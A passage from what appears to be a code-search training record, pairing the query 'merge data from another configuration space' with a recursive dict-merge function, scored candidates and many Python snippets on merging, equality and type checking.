test_same_type():\n\n for seq, exp in [\n ((1, ), True),\n ((1, 1.0, 1+0j), False),\n ((1, 10, 100), True),\n ((True, False, 10), False),\n (['abc', 'def', 'ghi'], True),\n (np.linspace(0, 1, 100), True),\n ]:\n assert same_type(*seq) == exp\n\n assert same_type(\n True, False, True, False, target_type=bool,\n )\n\n assert not same_type(\n True, False, True, False, target_type=int,\n )\n\n with pytest.raises(ValueError):\n same_type()", "def test_has_exactly_type():\r\n\r\n return has_exactly_type(1, int) and not has_exactly_type(True, int) and has_exactly_type(True, bool)", "def is_same_class(obj, a_class):\n return (type(obj) is a_class)", "def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name\n if type(self) != type(other):\n raise TypeError(\"Types do not match\")\n return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)", "def __eq__(self, other):\n return (isinstance(other, self.__class__) and\n (self.path == other.path) and\n (self.type == other.type))", "def is_same_class(obj, a_class):\n return(type(obj) is a_class)", "def 
is_same_class(obj, a_class):\n return type(obj) is a_class", "def is_same_class(obj, a_class):\n return type(obj) is a_class", "def is_compatible_to(self, other: 'Signature') -> bool:\n if self is other or self == other:\n return True\n # self.return_type must be compatible to other.return_type\n self_return_type, other_return_type = (self.return_type,\n other.return_type)\n # if self_return_type is None and other_return_type is not None:\n # return False\n # if self_return_type is not None and other_return_type is None:\n # return False\n if not _is_compatible(self_return_type, other_return_type):\n return False\n # other.var_arg_type must be compatible to self.var_arg_type\n self_var_arg_type, other_var_arg_type = (self.var_arg_type,\n other.var_arg_type)\n # if self_var_arg_type is None and other_var_arg_type is not None:\n # return False\n # if self_var_arg_type is not None and other_var_arg_type is None:\n # return False\n if not _is_compatible(other_var_arg_type, self_var_arg_type):\n return False\n # each type in other.arg_types must compatible the corresponding\n # type on self.arg_types\n self_arg_types, other_arg_types = self.arg_types, other.arg_types\n if len(self_arg_types) != len(other_arg_types):\n return False\n return (all((_is_compatible(oat, sat)\n for (oat, sat) in zip(other_arg_types, self_arg_types))))", "def has_exactly_type(obj, tpe):\r\n return type(obj) == tpe", "def type_or_class_match(node_a, node_b):\n if isinstance(node_b['node'], type):\n return issubclass(type(node_a['node']), node_b['node'])\n elif isinstance(node_a['node'], type):\n return issubclass(type(node_b['node']), node_a['node'])\n elif isinstance(node_b['node'], xf.PatternNode):\n return isinstance(node_a['node'], node_b['node'].node)\n elif isinstance(node_a['node'], xf.PatternNode):\n return isinstance(node_b['node'], node_a['node'].node)\n return isinstance(node_a['node'], type(node_b['node']))", "def _values_of_same_type(self, val1, val2):\n if (type(val1) in (np.ndarray, tuple, np.matrix)) and (\n type(val2) is type(val1)\n ):\n return True\n else:\n return super(ArrayParameter, self)._values_of_same_type(val1, val2)", "def is_same_class(obj, a_class):\n return isinstance(obj, a_class)", "def __eq__(self, other: object) -> bool:\n\n if not isinstance(other, self.__class__):\n return False\n\n if not self.simctl_type == other.simctl_type:\n return False\n\n return self.raw_info == other.raw_info", "def __eq__(self, other):\n if isinstance(other, self.__class__):\n if self.type_id != other.type_id:\n return False\n # floats are difficult to check for exact equality...\n if self.data_type == DataType.FLOAT or other.data_type == DataType.FLOAT:\n return isclose(self.data, other.data, rel_tol=1e-06)\n else:\n return self.data == other.data\n else:\n return False", "def test_type_equality(self):\r\n #list of matrices\r\n myType1 = TypedListType(T.TensorType(theano.config.floatX,\r\n (False, False)))\r\n #list of matrices\r\n myType2 = TypedListType(T.TensorType(theano.config.floatX,\r\n (False, False)))\r\n #list of scalars\r\n myType3 = TypedListType(T.TensorType(theano.config.floatX,\r\n ()))\r\n\r\n self.assertTrue(myType2 == myType1)\r\n self.assertFalse(myType3 == myType1)", "def is_same_class(self, other):\n return isinstance(other, Event) \\\n and self.title == other.title \\\n and self.time_start == other.time_start \\\n and self.time_end == other.time_end", "def is_same_class(obj, a_class):\n if type(obj) is a_class:\n return True\n else:\n return False", "def check_types(begin, end):\n 
try:\n begin.get_midpoint()\n end.get_midpoint()\n except AttributeError:\n return False\n\n return isinstance(begin.get_midpoint(), type(end.get_midpoint()))", "def is_same_class(obj, a_class):\n\n if type(obj) is a_class:\n return True\n return False", "def test_differentClassesEquality(self):\n self.assertFalse(Record(1, 2) == DifferentRecord(1, 2))", "def check_instance(self):\n self.assertIsInstance(self.amenity_1, amenity)\n self.assertIsInstance(self.amenity_2, amenity)", "def areIdentical(*args):\n return _libsbml.Unit_areIdentical(*args)", "def __eq__(self, other):\n if self is other:\n return True\n if type(self) == type(other):\n return self._name == other._name and self._calories == other._calories and \\\n self._carbohydrates == other._carbohydrates and self._fat == other._fat\\\n and self._proteins == other._proteins", "def check_representations(self: Q, q_2: Q) -> bool:\n\n if self.representation == q_2.representation:\n return True\n\n else:\n raise Exception(f\"Oops, 2 have different representations: {self.representation} {q_2.representation}\")", "def test_not_equal_on_type_mismatch(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = \"invalid\"\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def CheckType(self, *args, **kwargs):\n pass", "def _aresame(a, b):\n from .numbers import Number\n from .function import AppliedUndef, UndefinedFunction as UndefFunc\n if isinstance(a, Number) and isinstance(b, Number):\n return a == b and a.__class__ == b.__class__\n for i, j in zip_longest(_preorder_traversal(a), _preorder_traversal(b)):\n if i != j or type(i) != type(j):\n if ((isinstance(i, UndefFunc) and isinstance(j, UndefFunc)) or\n (isinstance(i, AppliedUndef) and isinstance(j, AppliedUndef))):\n if i.class_key() != j.class_key():\n return False\n else:\n return False\n return True", "def check_type(self):\n return True", "def equals_strings(self, item1, item2):\n if isinstance(item1, (text_type, binary_type)) is False or \\\n isinstance(item2, (text_type, binary_type)) is False:\n if self._verbose is True:\n logging.info(\"TypeError: Not same types \"\n \"(expected two strings).\")\n return False\n\n if isinstance(item1, binary_type):\n item1 = u(item1)\n if isinstance(item2, binary_type):\n item2 = u(item2)\n if self._case_sensitive is False:\n return item1.lower() == item2.lower()\n\n return item1 == item2", "def _equal_values(self, val1, val2):\n if self.f_supports(val1) != self.f_supports(val2):\n return False\n\n if not self.f_supports(val1) and not self.f_supports(val2):\n raise TypeError(\n \"I do not support the types of both inputs (`%s` and `%s`), \"\n \"therefore I cannot judge whether \"\n \"the two are equal.\" % (str(type(val1)), str(type(val2)))\n )\n\n if not self._values_of_same_type(val1, val2):\n return False\n\n return comparisons.nested_equal(val1, val2)", "def __eq__(self, other):\n if type(self) is not type(other):\n return NotImplemented\n \n # required\n if self.required != other.required:\n return False\n \n # title\n if self.title != other.title:\n return False\n \n # type\n if self.type is not other.type:\n return False\n \n # values\n if self.values != other.values:\n return False\n \n return True", "def __eq__(self, other: Any) -> bool:\n return (\n super().__eq__(other) and isinstance(other, AtomicField) and self._spark_data_type == other._spark_data_type\n )", "def __eq__(self, other: Any) -> bool:\n if not isinstance(other, type(self)):\n return NotImplemented\n return True", "def 
test_not_equal_on_type_mismatch(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = \"invalid\"\n\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def is_identical(self, other):\n return (self.compounddatatype == other.compounddatatype and\n self.min_row == other.min_row and\n self.max_row == other.max_row)", "def __eq__(self):\n if isinstance(other_book, Book):\n return self.title == other_book.title and self.isbn == other_book.isbn\n else:\n book_type=type(other_book)\n print(\"{other_book} is of type: {type}, and should be a User type\".format(other_book=other_book, type=book_type))", "def __eq__(self, other: Any) -> bool:\n # Subclasses should call this as part of their equality checks\n return (\n isinstance(other, BaseField)\n and self._is_nullable == other._is_nullable\n and self._resolve_field_name() == other._resolve_field_name() # may be None == None\n and self._spark_type_class == other._spark_type_class\n and self._metadata == other._metadata # may be None == None\n )", "def __eq__(self, other: Any) -> bool:\n return self.__class__ is other.__class__ and self.identifier == other.identifier", "def __eq__(self, other):\n if other.__class__ is not self.__class__:\n return NotImplemented\n return (\n self._tp__get_typed_properties()\n == other._tp__get_typed_properties()\n )", "def __eq__(self, other):\n if isinstance(other, six.string_types):\n return other == self.name\n elif isinstance(other, type(self)):\n return self.arrow_dtype == other.arrow_dtype\n else:\n return False", "def _assert_interface_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self._assert_parent_types_equal(type1, type2)\n self.assertEqual(\n set(type1.field_descriptors.iterkeys()),\n set(type2.field_descriptors.iterkeys()))\n for name, field_descriptor1 in type1.field_descriptors.iteritems():\n field_descriptor2 = type2.field_descriptors[name]\n self._assert_field_descriptors_equal(\n field_descriptor1, field_descriptor2)", "def same_as(self, other):\n return super().__eq__(other)", "def test_type(self):\n self.assertEqual(type(self.base1), BaseModel)\n self.assertEqual(type(self.base2), BaseModel)", "def test_difference_id(self):\n self.assertFalse(\n self.factory.create_type('iphone') is self.factory.create_type(\n 'iphone'))", "def is_equal(o1: object, o2: object) -> bool:\n if o1 is None and o2 is None:\n return True\n if o1 is None:\n return False\n return o1 == o2", "def __eq__(self, other):\n if isinstance(other, six.string_types):\n return other == self.name\n\n elif isinstance(other, type(self)):\n return self.xnd_dtype == other.xnd_dtype\n\n else:\n return False", "def checktypestest(chosen_df):\n for i in chosen_df:\n if not chosen_df.dtypes[1] == chosen_df.dtypes[i]:\n raise ValueError('Types do not match')", "def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name\n if type(self) != type(other):\n raise TypeError(\"Types do not match\")\n return not self.eq(other)", "def _assert_scalar_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self.assertEqual(\n type1.scalar_descriptor_class_descriptor,\n type2.scalar_descriptor_class_descriptor)", "def __eq__(self, other):\n # Ensure same class and values match\n if isinstance(other, self.__class__):\n return self.__dict__ == other.__dict__\n else:\n return False", 
"def __eq__(self, other):\n return (\n isinstance(other, ConstraintType)\n and self.value == other.value\n and self.type == other.type\n )", "def __eq__(self, other):\n if self.__class__ != other.__class__:\n return False\n if self.primary != other.primary:\n return False\n return True", "def IsSimilar(self,other):\n self.__do_essential_memebers_exist__()\n other.__do_essential_memebers_exist__()\n return self.element_type == other.element_type", "def is_type_correct(*args):\n return _ida_hexrays.is_type_correct(*args)", "def __eq__(self, other):\n return (type(other) == type(self)\n and self.using_default_schema == other.using_default_schema\n and self.settings == other.settings\n and self.schema == other.schema\n and self.comment == other.comment)" ]
[ "0.826196", "0.7960103", "0.7685877", "0.75767535", "0.73899287", "0.7386229", "0.73627245", "0.72946095", "0.7151994", "0.7137583", "0.7062871", "0.7059909", "0.70217156", "0.69869566", "0.6975931", "0.69511235", "0.6951103", "0.682518", "0.6799043", "0.6766386", "0.67605907", "0.6745303", "0.6722047", "0.670175", "0.6641782", "0.6639441", "0.6604472", "0.65744555", "0.6563849", "0.65568525", "0.65446717", "0.6540496", "0.6540496", "0.6530363", "0.6525939", "0.6504735", "0.65009266", "0.6499613", "0.6489849", "0.64874965", "0.6472127", "0.6463393", "0.6452949", "0.6413423", "0.64057183", "0.6400714", "0.6399411", "0.6399228", "0.6388263", "0.63857216", "0.6385192", "0.6385192", "0.63817614", "0.63798493", "0.6376636", "0.63676655", "0.6367213", "0.63616407", "0.6357671", "0.63487995", "0.6319506", "0.6318727", "0.6285338", "0.62511575", "0.62423074", "0.6224768", "0.622301", "0.62210155", "0.62177867", "0.6206882", "0.62008214", "0.6200605", "0.6197593", "0.6194674", "0.6192736", "0.6184774", "0.6183999", "0.61496806", "0.6146822", "0.6146146", "0.6141046", "0.6140275", "0.61391515", "0.613341", "0.6122416", "0.61173713", "0.6113544", "0.6110359", "0.6103479", "0.6100146", "0.6096894", "0.60949904", "0.6084059", "0.6077556", "0.6074251", "0.60725856", "0.60645235", "0.60581887", "0.6050377", "0.6048975" ]
0.8348503
0
Merge data from another configuration space into this one.
def merge(one, two, overwrite=False, typecheck=True): if one is two: return if typecheck and not same_type(one, two): raise ValueError('Type mismatch') for (key, value) in two.items(): if key not in one: one[key] = value if typecheck and not same_type(one[key], value): raise ValueError('Type mismatch') if isinstance(value, dict): merge(one[key], two[key], overwrite, typecheck) elif not overwrite: continue else: one[key] = two[key]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def merge(self, other_config):\n # Make a copy of the current attributes in the config object.\n config_options = copy.copy(self._user_provided_options)\n\n # Merge in the user provided options from the other config\n config_options.update(other_config._user_provided_options)\n\n # Return a new config object with the merged properties.\n return Config(**config_options)", "def update(self, other: Mapping[str, Any]) -> None:\n self._config.update(self._flatten_dict(other))", "def merge(self, other):\n merged = copy.deepcopy(self.__dict__())\n for k, v in other.__dict__():\n if k in merged and getattr(self, k):\n if isinstance(v, (string_types, bool)):\n pass\n else:\n list_of_stuff = merged.get(k, [])\n for entry in v:\n if entry not in list_of_stuff:\n list_of_stuff.append(entry)\n merged[k] = list_of_stuff\n else:\n merged[k] = v\n return CondaEnvironmentProvider(**merged)", "def _merge(self, other: dict):\n self._storage = dict_merge(self._storage, other)", "def merge(self, other):\n\n for n in other.cfg_nodes:\n self.insert_cfgnode(n)\n\n for ins_addr, outs in other.out_branches.items():\n if ins_addr in self.out_branches:\n for stmt_idx, item in outs.items():\n if stmt_idx in self.out_branches[ins_addr]:\n self.out_branches[ins_addr][stmt_idx].merge(item)\n else:\n self.out_branches[ins_addr][stmt_idx] = item\n\n else:\n item = next(iter(outs.values()))\n self.out_branches[ins_addr][item.stmt_idx] = item", "def merge(self, other):\n for p in other:\n for key, val in p.items():\n self.contents[key] = val\n\n return self", "def update(self, other):\n _merge_dicts(self, other)", "def merge(self, other):\n if other.n_points != self.n_points:\n raise ValueError(\n 'Deduplicator size mismatch: '\n f'{self.n_points} != {other.n_points}'\n )\n self.data_reduced.extend(other.data_reduced)\n self.data_kd.extend(other.data_kd)", "def mergeWith(self, other):\n assert not other.synthesised\n self.globals.update(other.globals)\n self.signals.update(other.signals)\n self.startsOfDataPaths.update(other.startsOfDataPaths)\n self.subUnits.update(other.subUnits)\n \n for s in other.signals:\n s.ctx = self", "def merge(self, other):\n self._moments = merge_pqc([self, other])._moments\n self._parameters = sp.symarray(self.parameter_symbol, len(self.symbols))\n if self.flatten_circuit:\n self.flatten()", "def _map_merge(dest: \"BaseContainer\", src: \"BaseContainer\") -> None:\n from omegaconf import AnyNode, DictConfig, OmegaConf, ValueNode\n\n assert isinstance(dest, DictConfig)\n assert isinstance(src, DictConfig)\n src_type = src._metadata.object_type\n src_ref_type = get_ref_type(src)\n assert src_ref_type is not None\n\n # If source DictConfig is:\n # - an interpolation => set the destination DictConfig to be the same interpolation\n # - None => set the destination DictConfig to None\n if src._is_interpolation() or src._is_none():\n dest._set_value(src._value())\n _update_types(node=dest, ref_type=src_ref_type, object_type=src_type)\n return\n\n dest._validate_merge(value=src)\n\n def expand(node: Container) -> None:\n rt = node._metadata.ref_type\n val: Any\n if rt is not Any:\n if is_dict_annotation(rt):\n val = {}\n elif is_list_annotation(rt):\n val = []\n else:\n val = rt\n elif isinstance(node, DictConfig):\n val = {}\n else:\n assert False\n\n node._set_value(val)\n\n if (\n src._is_missing()\n and not dest._is_missing()\n and is_structured_config(src_ref_type)\n ):\n # Replace `src` with a prototype of its corresponding structured config\n # whose fields are all missing (to avoid overwriting 
fields in `dest`).\n src = _create_structured_with_missing_fields(\n ref_type=src_ref_type, object_type=src_type\n )\n\n if (dest._is_interpolation() or dest._is_missing()) and not src._is_missing():\n expand(dest)\n\n for key, src_value in src.items_ex(resolve=False):\n src_node = src._get_node(key, validate_access=False)\n dest_node = dest._get_node(key, validate_access=False)\n\n if isinstance(dest_node, DictConfig):\n dest_node._validate_merge(value=src_node)\n\n missing_src_value = _is_missing_value(src_value)\n\n if (\n isinstance(dest_node, Container)\n and OmegaConf.is_none(dest, key)\n and not missing_src_value\n and not OmegaConf.is_none(src_value)\n ):\n expand(dest_node)\n\n if dest_node is not None and dest_node._is_interpolation():\n target_node = dest_node._dereference_node(\n throw_on_resolution_failure=False\n )\n if isinstance(target_node, Container):\n dest[key] = target_node\n dest_node = dest._get_node(key)\n\n if (\n dest_node is None\n and is_structured_config(dest._metadata.element_type)\n and not missing_src_value\n ):\n # merging into a new node. Use element_type as a base\n dest[key] = DictConfig(content=dest._metadata.element_type, parent=dest)\n dest_node = dest._get_node(key)\n\n if dest_node is not None:\n if isinstance(dest_node, BaseContainer):\n if isinstance(src_value, BaseContainer):\n dest_node._merge_with(src_value)\n elif not missing_src_value:\n dest.__setitem__(key, src_value)\n else:\n if isinstance(src_value, BaseContainer):\n dest.__setitem__(key, src_value)\n else:\n assert isinstance(dest_node, ValueNode)\n assert isinstance(src_node, ValueNode)\n # Compare to literal missing, ignoring interpolation\n src_node_missing = src_value == \"???\"\n try:\n if isinstance(dest_node, AnyNode):\n if src_node_missing:\n node = copy.copy(src_node)\n # if src node is missing, use the value from the dest_node,\n # but validate it against the type of the src node before assigment\n node._set_value(dest_node._value())\n else:\n node = src_node\n dest.__setitem__(key, node)\n else:\n if not src_node_missing:\n dest_node._set_value(src_value)\n\n except (ValidationError, ReadonlyConfigError) as e:\n dest._format_and_raise(key=key, value=src_value, cause=e)\n else:\n from omegaconf import open_dict\n\n if is_structured_config(src_type):\n # verified to be compatible above in _validate_merge\n with open_dict(dest):\n dest[key] = src._get_node(key)\n else:\n dest[key] = src._get_node(key)\n\n _update_types(node=dest, ref_type=src_ref_type, object_type=src_type)\n\n # explicit flags on the source config are replacing the flag values in the destination\n flags = src._metadata.flags\n assert flags is not None\n for flag, value in flags.items():\n if value is not None:\n dest._set_flag(flag, value)", "def extend(clself, other):\n clself._cfg_def.extend(other._cfg_def)\n for key, optdef in clself._cfg_def.options.iteritems():\n setattr(clself, key, optdef)", "def extend(self, other, adapt_conf=True):\n # Check if category metadata match\n if (self.size() > 0) and (other.size() > 0):\n for attr in [\"is_cat_inclusive\", \"is_categorised\"]:\n a, b = getattr(self, attr), getattr(other, attr)\n if a != b:\n raise ConcatenationError(\n f\"Categorisation metadata is different for '{attr}': {a} != {b}\"\n )\n elif other.size() > 0:\n for attr in [\"is_cat_inclusive\", \"is_categorised\"]:\n setattr(self, attr, getattr(other, attr))\n if getattr(self, \"tstep_h\", None) is None:\n self.tstep_h = getattr(other, \"tstep_h\", None)\n else:\n if getattr(other, \"tstep_h\", None) is 
not None:\n if self.tstep_h != other.tstep_h:\n raise ConcatenationError(\n \"Extending by a TrackRun with different timestep is not allowed\"\n )\n if adapt_conf and other.conf is not None:\n if self.conf is None:\n self.conf = other.conf.copy()\n else:\n for field in self.conf._fields:\n if getattr(self.conf, field) != getattr(other.conf, field):\n setattr(self.conf, field, None)\n self.sources.extend(other.sources)\n\n new_data = pd.concat([self.data, other.data], sort=False)\n new_track_idx = new_data.index.get_level_values(0).to_series()\n new_track_idx = new_track_idx.ne(new_track_idx.shift()).cumsum() - 1\n\n mux = pd.MultiIndex.from_arrays(\n [new_track_idx, new_data.index.get_level_values(1)], names=new_data.index.names\n )\n self.data = new_data.set_index(mux)\n\n # Concatenate categories\n if (self.cats is not None) or (other.cats is not None):\n new_cats = pd.concat([self.cats, other.cats], sort=False).fillna(False)\n new_track_idx = new_cats.index.get_level_values(0).to_series()\n new_track_idx = new_track_idx.ne(new_track_idx.shift()).cumsum() - 1\n\n ix = pd.Index(new_track_idx, name=new_cats.index.name)\n self.cats = new_cats.set_index(ix)", "def merge_from(self, other):\n assert not self.is_final\n if self.parent is not None:\n assert other.parent is not None\n self.parent.merge_from(other.parent)\n self.isolated_names.update(other.isolated_names)\n self.read.update(other.read)\n self.modified.update(other.modified)\n self.bound.update(other.bound)\n self.deleted.update(other.deleted)\n self.annotations.update(other.annotations)\n self.params.update(other.params)", "def merge(target_config, other_config):\n for key, value in other_config.items():\n if key not in target_config or not isinstance(value, dict):\n target_config[key] = value\n else:\n merge(target_config[key], other_config[key])", "def merge(self, other):\n\n assert self.ins_addr == other.ins_addr\n assert self.type == other.type\n\n o = self.copy()\n o.targets |= other.targets\n\n return o", "def merge(self, other):\n self.isotxsMetadata = self.isotxsMetadata.merge(\n other.isotxsMetadata, self, other, \"ISOTXS\", AttributeError\n )\n self.gamisoMetadata = self.gamisoMetadata.merge(\n other.gamisoMetadata, self, other, \"GAMISO\", AttributeError\n )\n self.pmatrxMetadata = self.pmatrxMetadata.merge(\n other.pmatrxMetadata, self, other, \"PMATRX\", AttributeError\n )\n self.micros.merge(other.micros)\n self.gammaXS.merge(other.gammaXS)\n self.neutronHeating = _mergeAttributes(self, other, \"neutronHeating\")\n self.neutronDamage = _mergeAttributes(self, other, \"neutronDamage\")\n self.gammaHeating = _mergeAttributes(self, other, \"gammaHeating\")\n self.isotropicProduction = _mergeAttributes(self, other, \"isotropicProduction\")\n self.linearAnisotropicProduction = _mergeAttributes(\n self, other, \"linearAnisotropicProduction\"\n )\n # this is lazy, but should work, because the n-order wouldn't be set without the others being set first.\n self.nOrderProductionMatrix = (\n self.nOrderProductionMatrix or other.nOrderProductionMatrix\n )", "def merge(self, other):\n log.debug('Merging: %s and %s' % (self.serialize(), other.serialize()))\n for k in self.keys():\n for new_item in other[k]:\n if new_item not in self[k]:\n self[k].append(new_item)\n log.debug('Result: %s' % self.serialize())\n return self", "def merge(self, other):\r\n self._train_datas = np.concatenate(\r\n [self._train_datas, other._train_datas], 0)\r\n self._train_labels = np.concatenate(\r\n [self._train_labels, other._train_labels], 0)", "def 
merge(self, newer_config, **kwargs):\n kwargs['merge'] = True\n logger.debug('from parent merge: %s', kwargs)\n return self.update(newer_config, **kwargs)", "def merge(self, other):\n from .dataset import Dataset\n\n if other is None:\n return self.to_dataset()\n else:\n other_vars = getattr(other, 'variables', other)\n coords = merge_coords_without_align([self.variables, other_vars])\n return Dataset._from_vars_and_coord_names(coords, set(coords))", "def combine(self, other):\n # Copy and merge\n ppt = PPT()\n ppt.contents = dict(self.contents)\n ppt.merge(other)\n return ppt", "def merge_configs(config1, config2, additional_keys = []):\n\t\tmerged_config = copy.deepcopy(config1)\n\t\t\n\t\tfor key in list(set([\n\t\t\t\t\"nicks\",\n\t\t\t\t\"directories\",\n\t\t\t\t\"files\",\n\t\t\t\t\"folders\",\n\t\t\t\t\"x_expressions\",\n\t\t\t\t\"scale_factors\",\n\t\t\t\t\"weights\",\n\t\t\t\t\"x_bins\",\n\t\t\t\t\"y_bins\",\n\t\t\t\t\"z_bins\",\n\t\t\t\t\"tree_draw_options\",\n\t\t\t\t\"proxy_prefixes\",\n\t\t\t\t\"histogram_to_scale_nicks\",\n\t\t\t\t\"integral_histogram_nicks\",\n\t\t\t\t\"scale_by_inverse_integrals\",\n\t\t\t\t\"add_nicks\",\n\t\t\t\t\"add_result_nicks\",\n\t\t\t\t\"sum_nicks\",\n\t\t\t\t\"sum_result_nicks\",\n\t\t\t\t\"stacks\",\n\t\t\t\t\"markers\",\n\t\t\t\t\"colors\",\n\t\t\t\t\"labels\",\n\t\t\t\t\"legend_markers\",\n\t\t\t\t\"shape_nicks\",\n\t\t\t\t\"yield_nicks\",\n\t\t\t\t\"shape_yield_nicks\"\n\t\t] + additional_keys)):\n\t\t\tif key in merged_config or key in config2:\n\t\t\t\tmerged_config.setdefault(key, []).extend(config2.get(key, []))\n\t\t\n\t\tfor key in [\n\t\t\t\t\"analysis_modules\",\n\t\t]:\n\t\t\tfor item in config2.get(key, []):\n\t\t\t\tif not item in merged_config.get(key, []):\n\t\t\t\t\tmerged_config.setdefault(key, []).append(item)\n\t\t\n\t\tfor key, value in config2.iteritems():\n\t\t\tif not key in merged_config:\n\t\t\t\tmerged_config[key] = value\n\t\t\n\t\treturn merged_config", "def merge(a, b):\n if isinstance(a, CONFIG_VALID) \\\n and isinstance(b, CONFIG_VALID):\n # dict update\n if isinstance(a, dict) and isinstance(b, dict):\n a.update(b)\n return a\n # list update\n _a = list(a)\n for x in list(b):\n if x not in _a:\n _a.append(x)\n return _a\n if a and b:\n raise Exception(\"Cannot merge\")\n raise NotImplementedError", "def deep_merge(d1, d2):\n for k, v in d1.copy().items():\n if k in d2:\n if all(isinstance(e, MutableMapping) for e in (v, d2[k])):\n d2[k] = ConfigManager.deep_merge(v, d2[k])\n\n if k == \"*\":\n for _k, _v in d2.items():\n if all(isinstance(e, MutableMapping) for e in (v, d2[_k])):\n d2[_k] = ConfigManager.deep_merge(v, d2[_k])\n del d1[k]\n d3 = d1.copy()\n d3.update(d2)\n return d3", "def merged_rep(self,other):\n raise NotImplementedError(\"Abstract method\")", "def merge(self, other):\n\n if not self.can_merge(other):\n raise ValueError('These protocols can not be safely merged.')\n\n inputs_to_consider = self._find_inputs_to_merge()\n\n for input_path in inputs_to_consider:\n\n merge_behavior = getattr(type(self), input_path.property_name).merge_behavior\n\n if merge_behavior == MergeBehaviour.ExactlyEqual:\n continue\n\n if (isinstance(self.get_value(input_path), ProtocolPath) or\n isinstance(other.get_value(input_path), ProtocolPath)):\n\n continue\n\n if merge_behavior == InequalityMergeBehaviour.SmallestValue:\n value = min(self.get_value(input_path), other.get_value(input_path))\n elif merge_behavior == InequalityMergeBehaviour.LargestValue:\n value = max(self.get_value(input_path), 
other.get_value(input_path))\n else:\n raise NotImplementedError()\n\n self.set_value(input_path, value)\n\n return {}", "def __add__(self, other):\r\n # Make a defaultdict of defaultdicts, the latter of which returns\r\n # None when an key is not present\r\n merged_data = defaultdict(lambda: defaultdict(lambda: None))\r\n\r\n # We will keep track of all unique sample_ids and metadata headers\r\n # we have seen as we go\r\n all_sample_ids = set()\r\n all_headers = set()\r\n\r\n # add all values from self into the merged_data structure\r\n for sample_id, data in self._metadata.iteritems():\r\n all_sample_ids.add(sample_id)\r\n for header, value in data.iteritems():\r\n all_headers.add(header)\r\n merged_data[sample_id][header] = value\r\n\r\n # then add all data from other\r\n for sample_id, data in other._metadata.iteritems():\r\n all_sample_ids.add(sample_id)\r\n for header, value in data.iteritems():\r\n all_headers.add(header)\r\n # if the two mapping files have identical sample_ids and\r\n # metadata columns but have DIFFERENT values, raise a value\r\n # error\r\n if merged_data[sample_id][header] is not None and \\\r\n merged_data[sample_id][header] != value:\r\n raise ValueError(\"Different values provided for %s for \"\r\n \"sample %s in different mapping files.\"\r\n % (header, sample_id))\r\n else:\r\n merged_data[sample_id][header] = value\r\n\r\n # Now, convert what we have seen into a normal dict\r\n normal_dict = {}\r\n for sample_id in all_sample_ids:\r\n if sample_id not in normal_dict:\r\n normal_dict[sample_id] = {}\r\n\r\n for header in all_headers:\r\n normal_dict[sample_id][header] = \\\r\n merged_data[sample_id][header]\r\n\r\n # and create a MetadataMap object from it; concatenate comments\r\n return self.__class__(normal_dict, self.Comments + other.Comments)", "def merge(self, graph):\n # keep previous self.filename\n # copy data\n for x in graph.data:\n self.data.append(x)\n # copy headers, unless already exists (is so, info is lost)\n for key in graph.headers:\n if key not in self.headers:\n self.headers.update({key: graph.headers[key]})\n # copy graphInfo, unless already exists (is so, info is lost)\n for key in graph.graphInfo:\n if key not in self.graphInfo:\n self.graphInfo.update({key: graph.graphInfo[key]})\n # copy sampleInfo, unless already exists (is so, info is lost)\n for key in graph.sampleInfo:\n if key not in self.sampleInfo:\n self.sampleInfo.update({key: graph.sampleInfo[key]})", "def concat(self, other):\n self.add_rules(other.cliques)\n self.prop_names.update(other.prop_names)", "def merge_other(self, other):\n assert(not other.isSet())\n with self.__cond:\n if self.__isset:\n other.set(self.__data)\n else:\n self.__merged.append(other)", "def __merge_configs(cls, a, b, path=None):\n\n # This function is modeled after:\n # https://stackoverflow.com/questions/7204805/dictionaries-of-dictionaries-merge\n\n if path is None: path = []\n\n for key in b:\n if key in a:\n if isinstance(a[key], dict) and isinstance(b[key], dict):\n cls.__merge_configs(a[key], b[key], path + [str(key)])\n elif isinstance(a[key], list) and isinstance(b[key], list):\n # Easy enough to merge lists of non-dict items...\n try:\n al = set(a[key])\n bl = set(b[key])\n bl.update(al)\n a[key] = list(bl)\n except (TypeError, AttributeError) as e:\n log.warning('problem merging lists when merging configurations'\n '(are there dict args in one at path %s?):'\n '\\n%s\\n%s\\nKeeping the first one due to error %s'\n % (path, a[key], b[key], e))\n else:\n # Same key, but different value 
type. This is difficult to\n # handle so we just keep the value of the first one.\n pass\n else:\n a[key] = b[key]\n return a", "def merge_config(a, b):\n for key, b_value in b.items():\n if not isinstance(b_value, dict):\n a[key] = b_value\n else:\n a_value = a.get(key)\n if a_value is not None and isinstance(a_value, dict):\n merge_config(a_value, b_value)\n else:\n a[key] = b_value\n return a", "def _merge(self):\n raise NotImplementedError", "def createMergedConfigFile(self):\n # Read config data\n if os.path.isfile(self.config_file):\n with open(self.config_file, 'r') as stream:\n try:\n cfg = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n if debug:\n print(\"Using Config file: \" + self.config_file)\n else:\n if debug:\n print(\"Config file does not exist: \" + self.config_file)\n exit(1)\n\n # If project namespace was not in the config file, set a default\n if (cfg is not None\n and 'generic' in cfg\n and 'project_namespace' in cfg['generic']\n and cfg['generic']['project_namespace'] is not None\n and len(cfg['generic']['project_namespace']) > 0):\n if debug:\n print(\"Using specified namespace\")\n else:\n conf_dir = os.path.dirname(self.config_file)\n cmd = \"cd \" + conf_dir + ' && basename `git rev-parse --show-toplevel`'\n try:\n result_bytes = subprocess.check_output(cmd,\n timeout=300,\n shell=True)\n project_namespace = result_bytes.decode('UTF-8').rstrip()\n if debug:\n print(\"Derived namespace from git: \" + project_namespace)\n except subprocess.CalledProcessError as e:\n if debug:\n print(\"Error deriving project namespace from git: \", e.output)\n sys.exit(1)\n # Insert the project_namespace into the config data\n if cfg is None:\n cfg = {}\n if 'generic' not in cfg:\n cfg['generic'] = {}\n cfg['generic']['project_namespace'] = 